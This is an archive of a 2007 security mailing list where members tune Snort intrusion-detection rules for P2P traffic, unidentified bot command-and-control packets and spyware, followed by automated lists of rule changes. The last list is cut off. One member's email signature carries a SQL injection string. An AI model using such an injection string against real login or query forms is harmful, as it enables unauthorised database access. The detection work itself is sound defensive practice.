From jonkman at bleedingthreats.net Thu Mar 1 00:29:14 2007 From: jonkman at bleedingthreats.net (Matt Jonkman) Date: Thu Mar 1 00:28:37 2007 Subject: [Bleeding-sigs] Unknown P2P Packets In-Reply-To: <45E61752.1010900@utc.edu> References: <45E5ECE5.9000003@bleedingthreats.net> <45E5F382.6090300@utc.edu> <45E5F632.9010502@utc.edu> <20070228232751.GA14906@fuseki.anthill.de> <45E61752.1010900@utc.edu> Message-ID: <45E61E5A.8060500@bleedingthreats.net> Excellent! Glad thats identified... Now, should we consider altering this signature to look for a wider port range? If we could add a depth or offset to nail that down some, the content string is long enough that it shouldn't be a HUGE load addition. Can I assume that the depth and offset you had in your sig Jeff would apply here and stay reliable? What expanded range of ports should we consider then? (I'm not limewire-savvy) Matt Jeff Kell wrote: > Markus Lude wrote: >> Do you have some hits from sid 2001809 too? Sid 2001809 is looking for >> limewire traffic. Maybe some unusal ports in your traffic? On which >> ports or port ranges do you see those packets? >> >> sid 2001809 rev 3: >> >> alert udp $HOME_NET 6346 -> $EXTERNAL_NET 6346:6700 (msg: "BLEEDING-EDGE P2P Limewire P2P UDP Traffic"; content:"|49 50 40 83 53 43 50 41|"; threshold: type threshold, track by_src,count 10, seconds 60; classtype: policy-violation; reference:url,www.limewire.com; sid: 2001809; rev:3; ) > Ah HAH! They just port jumped! > > Thanks Markus. Yes, they had fired some Limewire signatures earlier > (which results in undesirable "corrective measures" being taken), at > which point I guess they just changed the default port configurations. > I didn't examine the existing signature closely enough. > > That makes perfect sense now. > > Jeff > _______________________________________________ > Bleeding-sigs mailing list > Bleeding-sigs@bleedingthreats.net > http://lists.bleedingthreats.net/cgi-bin/mailman/listinfo/bleeding-sigs -- -------------------------------------------- Matthew Jonkman Bleeding Edge Threats 765-429-0398 765-807-3060 fax http://www.bleedingthreats.net -------------------------------------------- PGP: http://www.bleedingthreats.com/mattjonkman.asc From jonkman at bleedingthreats.net Thu Mar 1 00:59:30 2007 From: jonkman at bleedingthreats.net (Matt Jonkman) Date: Thu Mar 1 00:58:18 2007 Subject: [Bleeding-sigs] Unknown P2P Packets In-Reply-To: <45E61E5A.8060500@bleedingthreats.net> References: <45E5ECE5.9000003@bleedingthreats.net> <45E5F382.6090300@utc.edu> <45E5F632.9010502@utc.edu> <20070228232751.GA14906@fuseki.anthill.de> <45E61752.1010900@utc.edu> <45E61E5A.8060500@bleedingthreats.net> Message-ID: <45E62572.8050303@bleedingthreats.net> I've taken the liberty of making the port ranges like so, and adding depth and offset to the original limewire sig: alert udp $HOME_NET 1024:65535 -> $EXTERNAL_NET 1024:65535 (msg: "BLEEDING-EDGE P2P Limewire P2P UDP Traffic"; dsize:35; content:"|49 50 40 83 53 43 50 41 00 00|"; offset:25; depth:10; threshold: type both, track by_src, count 1, seconds 360; classtype: policy-violation; reference:url,www.limewire.com; sid: 2001809; rev:4;) I think this will be accurate, but I want to make sure it's not going to overload sensors. Just being udp and over 1024 I think it'll be fine. Please report how it goes Matt Matt Jonkman wrote: > Excellent! Glad thats identified... > > Now, should we consider altering this signature to look for a wider port > range? If we could add a depth or offset to nail that down some, the > content string is long enough that it shouldn't be a HUGE load addition. > > Can I assume that the depth and offset you had in your sig Jeff would > apply here and stay reliable? > > What expanded range of ports should we consider then? (I'm not > limewire-savvy) > > Matt > > Jeff Kell wrote: >> Markus Lude wrote: >>> Do you have some hits from sid 2001809 too? Sid 2001809 is looking for >>> limewire traffic. Maybe some unusal ports in your traffic? On which >>> ports or port ranges do you see those packets? >>> >>> sid 2001809 rev 3: >>> >>> alert udp $HOME_NET 6346 -> $EXTERNAL_NET 6346:6700 (msg: "BLEEDING-EDGE P2P Limewire P2P UDP Traffic"; content:"|49 50 40 83 53 43 50 41|"; threshold: type threshold, track by_src,count 10, seconds 60; classtype: policy-violation; reference:url,www.limewire.com; sid: 2001809; rev:3; ) >> Ah HAH! They just port jumped! >> >> Thanks Markus. Yes, they had fired some Limewire signatures earlier >> (which results in undesirable "corrective measures" being taken), at >> which point I guess they just changed the default port configurations. >> I didn't examine the existing signature closely enough. >> >> That makes perfect sense now. >> >> Jeff >> _______________________________________________ >> Bleeding-sigs mailing list >> Bleeding-sigs@bleedingthreats.net >> http://lists.bleedingthreats.net/cgi-bin/mailman/listinfo/bleeding-sigs > -- -------------------------------------------- Matthew Jonkman Bleeding Edge Threats 765-429-0398 765-807-3060 fax http://www.bleedingthreats.net -------------------------------------------- PGP: http://www.bleedingthreats.com/mattjonkman.asc From markus.lude at gmx.de Thu Mar 1 01:40:32 2007 From: markus.lude at gmx.de (Markus Lude) Date: Thu Mar 1 01:41:01 2007 Subject: [Bleeding-sigs] Edonkey sigs In-Reply-To: <45E5F8AE.2050105@bleedingthreats.net> References: <45E5ED95.8020007@auckland.ac.nz> <45E5F8AE.2050105@bleedingthreats.net> Message-ID: <20070301014032.GA3885@fuseki.anthill.de> On Wed, Feb 28, 2007 at 04:48:30PM -0500, Matt Jonkman wrote: > Hey Russell: > > Russell Fulton wrote: > > Hi Folk, > > > > For some time (several months) I have been getting loads of FPs from the > > Edonkey sigs. These seem to be mainly caused by Skype (the new video > > protocol ?) and some times Bit torrent. The current sigs just look at > > the first two bytes of the packet (IIRC) the first of which is always 0xE3. > > > > I definitely welcome the help. Which ones are falsing for you: > > http://www.bleedingthreats.net/cgi-bin/viewcvs.cgi/sigs/P2P/P2P_Edonkey_Traffic?view=markup > > The ones I did recently, or the older ones? > > > > I suspect that the rules can be improved considerable by using flowbits, > > i.e. changing some of the rules to set flowbits and using other to > > trigger if the other one is set. I'd be prepared to do some work on > > this but I will need a good description of the protocol first. I'll > > google but if anyone has something useful then please let me know. > > > > Unfortunately, it's all UDP. Flowbits won't transfer from one packet to > another (don't think). > > I wrote those mostly from the storm worm traffic, and watching a regular > edonkey client. I searched a lot and found a couple of papers, one of > which is referenced in the sigs. There's no official doc out there I was > able to find. > > Frankly, most of the analysis I did in wireshark telling it to process > the packets as edonkey. Did a good job, things matched up well to what > it expected, just on new ports and all udp. > > I REALLY suspect that skype and some of the game protocols are using > some edonkey stuff to find peers to talk to, push or pull updates, etc. > It's a very good way to distribute info among a lot of peers... The old ones works fine for me, the new ones fires for some of our local gamers (counter strike and maybe others). Most of them could be identified by port 27000 or somewhat slightly above. > But ya, lets work on these. Maybe by tightening up the dsizes we can > make them better, but I'm still not convinlse positives'... Not wanted, > but probably accurate. > > Matt Markus From shirkdog_list at hotmail.com Thu Mar 1 02:13:21 2007 From: shirkdog_list at hotmail.com (M. Shirk) Date: Thu Mar 1 02:14:03 2007 Subject: [Bleeding-sigs] Edonkey sigs In-Reply-To: <20070301014032.GA3885@fuseki.anthill.de> Message-ID: Enemy Territory generates false positives on those signatures :-) Shirkdog ' or 1=1-- http://www.shirkdog.us >From: Markus Lude >Reply-To: Bleeding Sigs >To: Bleeding Sigs >Subject: Re: [Bleeding-sigs] Edonkey sigs >Date: Thu, 1 Mar 2007 02:40:32 +0100 > >On Wed, Feb 28, 2007 at 04:48:30PM -0500, Matt Jonkman wrote: > > Hey Russell: > > > > Russell Fulton wrote: > > > Hi Folk, > > > > > > For some time (several months) I have been getting loads of FPs from >the > > > Edonkey sigs. These seem to be mainly caused by Skype (the new video > > > protocol ?) and some times Bit torrent. The current sigs just look at > > > the first two bytes of the packet (IIRC) the first of which is always >0xE3. > > > > > > > I definitely welcome the help. Which ones are falsing for you: > > > > >http://www.bleedingthreats.net/cgi-bin/viewcvs.cgi/sigs/P2P/P2P_Edonkey_Traffic?view=markup > > > > The ones I did recently, or the older ones? > > > > > > > I suspect that the rules can be improved considerable by using >flowbits, > > > i.e. changing some of the rules to set flowbits and using other to > > > trigger if the other one is set. I'd be prepared to do some work on > > > this but I will need a good description of the protocol first. I'll > > > google but if anyone has something useful then please let me know. > > > > > > > Unfortunately, it's all UDP. Flowbits won't transfer from one packet to > > another (don't think). > > > > I wrote those mostly from the storm worm traffic, and watching a regular > > edonkey client. I searched a lot and found a couple of papers, one of > > which is referenced in the sigs. There's no official doc out there I was > > able to find. > > > > Frankly, most of the analysis I did in wireshark telling it to process > > the packets as edonkey. Did a good job, things matched up well to what > > it expected, just on new ports and all udp. > > > > I REALLY suspect that skype and some of the game protocols are using > > some edonkey stuff to find peers to talk to, push or pull updates, etc. > > It's a very good way to distribute info among a lot of peers... > >The old ones works fine for me, the new ones fires for some of our local >gamers (counter strike and maybe others). Most of them could be >identified by port 27000 or somewhat slightly above. > > > But ya, lets work on these. Maybe by tightening up the dsizes we can > > make them better, but I'm still not convinlse positives'... Not wanted, > > but probably accurate. > > > > Matt > >Markus > >_______________________________________________ >Bleeding-sigs mailing list >Bleeding-sigs@bleedingthreats.net >http://lists.bleedingthreats.net/cgi-bin/mailman/listinfo/bleeding-sigs _________________________________________________________________ With tax season right around the corner, make sure to follow these few simple tips. http://articles.moneycentral.msn.com/Taxes/PreparationTips/PreparationTips.aspx?icid=HMFebtagline From jonkman at bleedingthreats.net Thu Mar 1 06:03:45 2007 From: jonkman at bleedingthreats.net (Matt Jonkman) Date: Thu Mar 1 06:03:51 2007 Subject: [Bleeding-sigs] Unknown Bot Message-ID: <45E66CC1.2010905@bleedingthreats.net> New bot out there. Here are crude sigs. Haven't figured out the C&C yet, but this will hit. If you get hits please report them. Need more detail and more variants. #So far unidentified bot and c&c channel. Working on it. These are crude sigs, # please let me know if you get hits. Need more information on this one. #Matt Jonkman alert tcp $HOME_NET any -> $EXTERNAL_NET 1024:65535 (msg:"BLEEDING-EDGE CURRENT EVENTS Unknown Bot Outbound C&C Packet"; flow:established,to_server; dsize:48; content:"|3f 33 7a f8 b5 df 0e 28 cb 58 5d b5 0d c3 ef ce 1f 72 4a 60 d3 6f 92 7b 42 8f|"; classtype:unknown; reference:url,doc.bleedingthreats.net/2003460; sid:2003460; rev:1;) alert tcp $EXTERNAL_NET 1024:65535 -> $HOME_NET any (msg:"BLEEDING-EDGE CURRENT EVENTS Unknown Bot Inbound C&C Packet"; flow:established,to_server; dsize:48; content:"|ce 01 36 f6 88 7b 94 0d c5 f9 10 bf a4 e5 05 de fd ba cd 4f b9 91 db 10 5e 6f|"; classtype:unknown; reference:url,doc.bleedingthreats.net/2003460; sid:2003461; rev:1;) -- -------------------------------------------- Matthew Jonkman Bleeding Edge Threats 765-429-0398 765-807-3060 fax http://www.bleedingthreats.net -------------------------------------------- PGP: http://www.bleedingthreats.com/mattjonkman.asc From jonkman at bleedingthreats.net Thu Mar 1 13:53:37 2007 From: jonkman at bleedingthreats.net (Matt Jonkman) Date: Thu Mar 1 13:52:03 2007 Subject: [Bleeding-sigs] P0F in Snort - Available for download In-Reply-To: <20070227205558.ivpdix8c8aogoowc@192.168.168.10> References: <45BBDA18.9030309@bleedingthreats.net> <20070226072944.8x4g4et7fns4ksco@192.168.168.10> <20070227205558.ivpdix8c8aogoowc@192.168.168.10> Message-ID: <45E6DAE1.5080007@bleedingthreats.net> Thanks for posting that Jack. Anyone take a minute to check it out? What are your thoughts? Matt Jack Pepper wrote: > > > Available for download at > http://www.autoshun.org/files/Snort-P0f-plugin.tgz > > Give it a shot, lemme know how it works for you. > > jp > >> Quoting Matt Jonkman : >> >>> Stray thought: ANyone ever seen or thought about integrating p0f into >>> snort? P0f is an OS detection tool that's uncannily accurate by tcp >>> behavior, totally passive. > >> >> How many BT readers out there have p0f already running on their snort >> box? I decided to make as few changes as possible to the p0f code. >> Since p0f uses a unix socket file only, p0f needs to run on the same >> machine as the IDS. It really works out better that way IMO, since the >> promiscuous port is already open on the snort connection. >> >> It does require a patch to the p0f code to fix-up some wild-card >> processing, So if you can't recompile p0f from source you are not a >> candidate. >> >> It does require snort to be recompiled from source, So if you can't >> recompile snort from source you are not a candidate. >> >> I have only tested it with snort 2.6.1.2 . Other testers are invited, >> please forward findings to me directly, rather than through the BT >> list, so we don't junk up the list. >> > > > ------------------------------------------------- > Email solutions, MS Exchange alternatives and extrication, > security services, systems integration. > Contact: services@doctorunix.com > > > _______________________________________________ > Bleeding-sigs mailing list > Bleeding-sigs@bleedingthreats.net > http://lists.bleedingthreats.net/cgi-bin/mailman/listinfo/bleeding-sigs -- -------------------------------------------- Matthew Jonkman Bleeding Edge Threats 765-429-0398 765-807-3060 fax http://www.bleedingthreats.net -------------------------------------------- PGP: http://www.bleedingthreats.com/mattjonkman.asc From jonkman at bleedingthreats.net Thu Mar 1 14:18:35 2007 From: jonkman at bleedingthreats.net (Matt Jonkman) Date: Thu Mar 1 14:18:03 2007 Subject: [Bleeding-sigs] Edonkey sigs In-Reply-To: References: Message-ID: <45E6E0BB.5020805@bleedingthreats.net> You're not supposed to be doing that at work you know.... :) Seriously though, do you happen to have any packet data around from a false? Again, I really suspect these are real edonkey packets in use by those games. But want to find out for sure. Matt M. Shirk wrote: > Enemy Territory generates false positives on those signatures :-) > > > Shirkdog > ' or 1=1-- > http://www.shirkdog.us > > > > > >> From: Markus Lude >> Reply-To: Bleeding Sigs >> To: Bleeding Sigs >> Subject: Re: [Bleeding-sigs] Edonkey sigs >> Date: Thu, 1 Mar 2007 02:40:32 +0100 >> >> On Wed, Feb 28, 2007 at 04:48:30PM -0500, Matt Jonkman wrote: >> > Hey Russell: >> > >> > Russell Fulton wrote: >> > > Hi Folk, >> > > >> > > For some time (several months) I have been getting loads of FPs >> from the >> > > Edonkey sigs. These seem to be mainly caused by Skype (the new video >> > > protocol ?) and some times Bit torrent. The current sigs just >> look at >> > > the first two bytes of the packet (IIRC) the first of which is >> always 0xE3. >> > > >> > >> > I definitely welcome the help. Which ones are falsing for you: >> > >> > >> http://www.bleedingthreats.net/cgi-bin/viewcvs.cgi/sigs/P2P/P2P_Edonkey_Traffic?view=markup >> >> > >> > The ones I did recently, or the older ones? >> > >> > >> > > I suspect that the rules can be improved considerable by using >> flowbits, >> > > i.e. changing some of the rules to set flowbits and using other to >> > > trigger if the other one is set. I'd be prepared to do some work on >> > > this but I will need a good description of the protocol first. I'll >> > > google but if anyone has something useful then please let me know. >> > > >> > >> > Unfortunately, it's all UDP. Flowbits won't transfer from one packet to >> > another (don't think). >> > >> > I wrote those mostly from the storm worm traffic, and watching a >> regular >> > edonkey client. I searched a lot and found a couple of papers, one of >> > which is referenced in the sigs. There's no official doc out there I >> was >> > able to find. >> > >> > Frankly, most of the analysis I did in wireshark telling it to process >> > the packets as edonkey. Did a good job, things matched up well to what >> > it expected, just on new ports and all udp. >> > >> > I REALLY suspect that skype and some of the game protocols are using >> > some edonkey stuff to find peers to talk to, push or pull updates, etc. >> > It's a very good way to distribute info among a lot of peers... >> >> The old ones works fine for me, the new ones fires for some of our local >> gamers (counter strike and maybe others). Most of them could be >> identified by port 27000 or somewhat slightly above. >> >> > But ya, lets work on these. Maybe by tightening up the dsizes we can >> > make them better, but I'm still not convinlse positives'... Not >> wanted, >> > but probably accurate. >> > >> > Matt >> >> Markus >> >> _______________________________________________ >> Bleeding-sigs mailing list >> Bleeding-sigs@bleedingthreats.net >> http://lists.bleedingthreats.net/cgi-bin/mailman/listinfo/bleeding-sigs > > _________________________________________________________________ > With tax season right around the corner, make sure to follow these few > simple tips. > http://articles.moneycentral.msn.com/Taxes/PreparationTips/PreparationTips.aspx?icid=HMFebtagline > > > _______________________________________________ > Bleeding-sigs mailing list > Bleeding-sigs@bleedingthreats.net > http://lists.bleedingthreats.net/cgi-bin/mailman/listinfo/bleeding-sigs -- -------------------------------------------- Matthew Jonkman Bleeding Edge Threats 765-429-0398 765-807-3060 fax http://www.bleedingthreats.net -------------------------------------------- PGP: http://www.bleedingthreats.com/mattjonkman.asc From security at brvenik.com Thu Mar 1 15:59:51 2007 From: security at brvenik.com (Jason) Date: Thu Mar 1 16:01:03 2007 Subject: [Bleeding-sigs] P0F in Snort - Available for download In-Reply-To: <45E6DAE1.5080007@bleedingthreats.net> References: <45BBDA18.9030309@bleedingthreats.net> <20070226072944.8x4g4et7fns4ksco@192.168.168.10> <20070227205558.ivpdix8c8aogoowc@192.168.168.10> <45E6DAE1.5080007@bleedingthreats.net> Message-ID: <45E6F877.7080507@brvenik.com> I'm trying to understand the benefit over existing works. Admittedly I've not had a chance to dig into both but it seems that Snort!(fp) can already do this without the dependencies. http://mysite.verizon.net/sdreed/ Matt Jonkman wrote: > Thanks for posting that Jack. > > Anyone take a minute to check it out? What are your thoughts? > > Matt > > Jack Pepper wrote: >> >> Available for download at >> http://www.autoshun.org/files/Snort-P0f-plugin.tgz >> >> Give it a shot, lemme know how it works for you. >> >> jp >> >>> Quoting Matt Jonkman : >>> >>>> Stray thought: ANyone ever seen or thought about integrating p0f into >>>> snort? P0f is an OS detection tool that's uncannily accurate by tcp >>>> behavior, totally passive. >>> How many BT readers out there have p0f already running on their snort >>> box? I decided to make as few changes as possible to the p0f code. >>> Since p0f uses a unix socket file only, p0f needs to run on the same >>> machine as the IDS. It really works out better that way IMO, since the >>> promiscuous port is already open on the snort connection. >>> >>> It does require a patch to the p0f code to fix-up some wild-card >>> processing, So if you can't recompile p0f from source you are not a >>> candidate. >>> >>> It does require snort to be recompiled from source, So if you can't >>> recompile snort from source you are not a candidate. >>> >>> I have only tested it with snort 2.6.1.2 . Other testers are invited, >>> please forward findings to me directly, rather than through the BT >>> list, so we don't junk up the list. >>> >> >> ------------------------------------------------- >> Email solutions, MS Exchange alternatives and extrication, >> security services, systems integration. >> Contact: services@doctorunix.com >> >> >> _______________________________________________ >> Bleeding-sigs mailing list >> Bleeding-sigs@bleedingthreats.net >> http://lists.bleedingthreats.net/cgi-bin/mailman/listinfo/bleeding-sigs > From pepperjack at doctorunix.com Thu Mar 1 16:35:51 2007 From: pepperjack at doctorunix.com (Jack Pepper) Date: Thu Mar 1 16:37:04 2007 Subject: [Bleeding-sigs] P0F in Snort - Available for download In-Reply-To: <45E6F877.7080507@brvenik.com> References: <45BBDA18.9030309@bleedingthreats.net> <20070226072944.8x4g4et7fns4ksco@192.168.168.10> <20070227205558.ivpdix8c8aogoowc@192.168.168.10> <45E6DAE1.5080007@bleedingthreats.net> <45E6F877.7080507@brvenik.com> Message-ID: <20070301103551.byamkm099ck44w0c@mail.doctorunix.com> Quoting Jason : > I'm trying to understand the benefit over existing works. Admittedly > I've not had a chance to dig into both but it seems that Snort!(fp) can > already do this without the dependencies. > > http://mysite.verizon.net/sdreed/ > I honestly did not know about snort!(fp). I must say (at the risk of being flamed to death) that I think the Snort!(fp) approach is way too complex and problematic. What he has done is *duplicate* the functions of p0f inside of Snort, rather than *use p0f as a utility*. When MZ @ p0f makes a new version or stunning revelation of passive fingerprinting, the Snort!(fp) process will need to be completely reinvented. I suspect people should do what works for them. I certainly do not intend to supplant snort!(fp), I just didn't know about it. jp ------------------------------------------------- Email solutions, MS Exchange alternatives and extrication, security services, systems integration. Contact: services@doctorunix.com From jonkman at bleedingthreats.net Thu Mar 1 16:51:27 2007 From: jonkman at bleedingthreats.net (Matt Jonkman) Date: Thu Mar 1 16:49:58 2007 Subject: [Bleeding-sigs] P0F in Snort - Available for download In-Reply-To: <45E6F877.7080507@brvenik.com> References: <45BBDA18.9030309@bleedingthreats.net> <20070226072944.8x4g4et7fns4ksco@192.168.168.10> <20070227205558.ivpdix8c8aogoowc@192.168.168.10> <45E6DAE1.5080007@bleedingthreats.net> <45E6F877.7080507@brvenik.com> Message-ID: <45E7048F.8090009@bleedingthreats.net> Wasn't aware that existed. Cool! it's not up to date though. Have you been using it? If so, is it quick? Matt Jason wrote: > I'm trying to understand the benefit over existing works. Admittedly > I've not had a chance to dig into both but it seems that Snort!(fp) can > already do this without the dependencies. > > http://mysite.verizon.net/sdreed/ > > > > Matt Jonkman wrote: >> Thanks for posting that Jack. >> >> Anyone take a minute to check it out? What are your thoughts? >> >> Matt >> >> Jack Pepper wrote: >>> Available for download at >>> http://www.autoshun.org/files/Snort-P0f-plugin.tgz >>> >>> Give it a shot, lemme know how it works for you. >>> >>> jp >>> >>>> Quoting Matt Jonkman : >>>> >>>>> Stray thought: ANyone ever seen or thought about integrating p0f into >>>>> snort? P0f is an OS detection tool that's uncannily accurate by tcp >>>>> behavior, totally passive. >>>> How many BT readers out there have p0f already running on their snort >>>> box? I decided to make as few changes as possible to the p0f code. >>>> Since p0f uses a unix socket file only, p0f needs to run on the same >>>> machine as the IDS. It really works out better that way IMO, since the >>>> promiscuous port is already open on the snort connection. >>>> >>>> It does require a patch to the p0f code to fix-up some wild-card >>>> processing, So if you can't recompile p0f from source you are not a >>>> candidate. >>>> >>>> It does require snort to be recompiled from source, So if you can't >>>> recompile snort from source you are not a candidate. >>>> >>>> I have only tested it with snort 2.6.1.2 . Other testers are invited, >>>> please forward findings to me directly, rather than through the BT >>>> list, so we don't junk up the list. >>>> >>> ------------------------------------------------- >>> Email solutions, MS Exchange alternatives and extrication, >>> security services, systems integration. >>> Contact: services@doctorunix.com >>> >>> >>> _______________________________________________ >>> Bleeding-sigs mailing list >>> Bleeding-sigs@bleedingthreats.net >>> http://lists.bleedingthreats.net/cgi-bin/mailman/listinfo/bleeding-sigs > _______________________________________________ > Bleeding-sigs mailing list > Bleeding-sigs@bleedingthreats.net > http://lists.bleedingthreats.net/cgi-bin/mailman/listinfo/bleeding-sigs -- -------------------------------------------- Matthew Jonkman Bleeding Edge Threats 765-429-0398 765-807-3060 fax http://www.bleedingthreats.net -------------------------------------------- PGP: http://www.bleedingthreats.com/mattjonkman.asc From bleeding at bleedingthreats.net Thu Mar 1 18:00:08 2007 From: bleeding at bleedingthreats.net (bleeding@bleedingthreats.net) Date: Thu Mar 1 18:00:28 2007 Subject: [Bleeding-sigs] Bleeding Edge Threats Daily Signature Changes Message-ID: <20070301180008.6092922C0B2@sb03.us.bleedingsnort.com> [***] Results from Oinkmaster started Thu Mar 1 18:00:08 2007 [***] [+++] Added rules: [+++] 2003460 - BLEEDING-EDGE CURRENT EVENTS Unknown Bot Outbound C&C Packet (bleeding.rules) 2003461 - BLEEDING-EDGE CURRENT EVENTS Unknown Bot Inbound C&C Packet (bleeding.rules) 2400001 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules) 2400002 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules) 2400003 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules) 2400004 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules) 2401001 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules) 2401002 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules) 2401003 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules) 2401004 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules) [///] Modified active rules: [///] 2001809 - BLEEDING-EDGE P2P Limewire P2P UDP Traffic (bleeding-p2p.rules) 2400000 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules) 2401000 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules) 2402000 - BLEEDING-EDGE DROP Dshield Block Listed Source (bleeding-dshield.rules) 2403000 - BLEEDING-EDGE DROP Dshield Block Listed Source - BLOCKING (bleeding-dshield-BLOCK.rules) 2404000 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 1) (bleeding-botcc.rules) 2404001 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 2) (bleeding-botcc.rules) 2404002 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 3) (bleeding-botcc.rules) 2404003 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 4) (bleeding-botcc.rules) 2404004 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 5) (bleeding-botcc.rules) 2404005 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 6) (bleeding-botcc.rules) 2404006 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 7) (bleeding-botcc.rules) 2405000 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 1) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405001 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 2) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405002 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 3) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405003 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 4) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405004 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 5) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405005 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 6) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405006 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 7) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) [+++] Added non-rule lines: [+++] -> Added to bleeding-drop-BLOCK.rules (1): # VERSION 109 -> Added to bleeding-drop.rules (1): # VERSION 109 -> Added to bleeding-p2p.rules (1): #Depth and offset added by Jeff Kell -> Added to bleeding-sid-msg.map (10): 2003460 || BLEEDING-EDGE CURRENT EVENTS Unknown Bot Outbound C&C Packet || url,doc.bleedingthreats.net/2003460 2003461 || BLEEDING-EDGE CURRENT EVENTS Unknown Bot Inbound C&C Packet || url,doc.bleedingthreats.net/2003460 2400001 || BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound || url,www.spamhaus.org/drop/drop.lasso 2400002 || BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound || url,www.spamhaus.org/drop/drop.lasso 2400003 || BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound || url,www.spamhaus.org/drop/drop.lasso 2400004 || BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound || url,www.spamhaus.org/drop/drop.lasso 2401001 || BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE || url,www.spamhaus.org/drop/drop.lasso 2401002 || BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE || url,www.spamhaus.org/drop/drop.lasso 2401003 || BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE || url,www.spamhaus.org/drop/drop.lasso 2401004 || BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE || url,www.spamhaus.org/drop/drop.lasso -> Added to bleeding.rules (3): #So far unidentified bot and c&c channel. Working on it. These are crude sigs, # please let me know if you get hits. Need more information on this one. #Matt Jonkman [---] Removed non-rule lines: [---] -> Removed from bleeding-drop-BLOCK.rules (1): # VERSION 108 -> Removed from bleeding-drop.rules (1): # VERSION 108 From bleeding at bleedingthreats.net Fri Mar 2 15:00:05 2007 From: bleeding at bleedingthreats.net (bleeding@bleedingthreats.net) Date: Fri Mar 2 15:00:16 2007 Subject: [Bleeding-sigs] Bleeding Edge Threats Weekly Signature Changes Message-ID: <20070302150005.A5DA322C088@sb03.us.bleedingsnort.com> [***] Results from Oinkmaster started Fri Mar 2 15:00:05 2007 [***] [+++] Added rules: [+++] 2003436 - BLEEDING-EDGE TROJAN Warezov/Stration Communicating with Controller 2 (bleeding-virus.rules) 2003437 - BLEEDING-EDGE P2P Ares over UDP (bleeding-p2p.rules) 2003438 - BLEEDING-EDGE MALWARE Abcsearch.com Spyware Reporting (bleeding-malware.rules) 2003439 - BLEEDING-EDGE MALWARE Dropspam.com Spyware Install User-Agent (DSInstall) (bleeding-malware.rules) 2003440 - BLEEDING-EDGE MALWARE Dropspam.com Spyware Reporting (bleeding-malware.rules) 2003441 - BLEEDING-EDGE MALWARE Webbuying.net Spyware Install User-Agent (wbi_v0.90) (bleeding-malware.rules) 2003442 - BLEEDING-EDGE MALWARE Webbuying.net Spyware Installing (bleeding-malware.rules) 2003444 - BLEEDING-EDGE MALWARE Deskwizz.com Spyware Install Code Download (bleeding-malware.rules) 2003445 - BLEEDING-EDGE MALWARE Deskwizz.com Spyware Install INI Download (bleeding-malware.rules) 2003446 - BLEEDING-EDGE MALWARE Adware Command Client Checkin (bleeding-malware.rules) 2003447 - BLEEDING-EDGE MALWARE Humanclick.com Client Checkin (bleeding-malware.rules) 2003448 - BLEEDING-EDGE MALWARE Humanclick.com Client Update (bleeding-malware.rules) 2003449 - BLEEDING-EDGE MALWARE Webbuying.net Spyware Install User-Agent 2 (wb v1.6.4) (bleeding-malware.rules) 2003450 - BLEEDING-EDGE MALWARE Specificclick.net Spyware Activity (bleeding-malware.rules) 2003451 - BLEEDING-EDGE MALWARE K8l.info Spyware Activity (bleeding-malware.rules) 2003452 - BLEEDING-EDGE MALWARE LoopAd/Secure-browser.com Spyware User-Agent (rw.exe) (bleeding-malware.rules) 2003453 - BLEEDING-EDGE POLICY Netvacy.com Anonymizing Proxy Access (bleeding-policy.rules) 2003454 - BLEEDING-EDGE POLICY Yahoo 360 Social Site Access (bleeding-policy.rules) 2003455 - BLEEDING-EDGE POLICY Hi5.com Social Site Access (bleeding-policy.rules) 2003456 - BLEEDING-EDGE POLICY Gazzag.com Social Site Access (bleeding-policy.rules) 2003457 - BLEEDING-EDGE POLICY Metacafe.com Social Site Access (bleeding-policy.rules) 2003458 - BLEEDING-EDGE POLICY Orkut.com Social Site Access (bleeding-policy.rules) 2003460 - BLEEDING-EDGE CURRENT EVENTS Unknown Bot Outbound C&C Packet 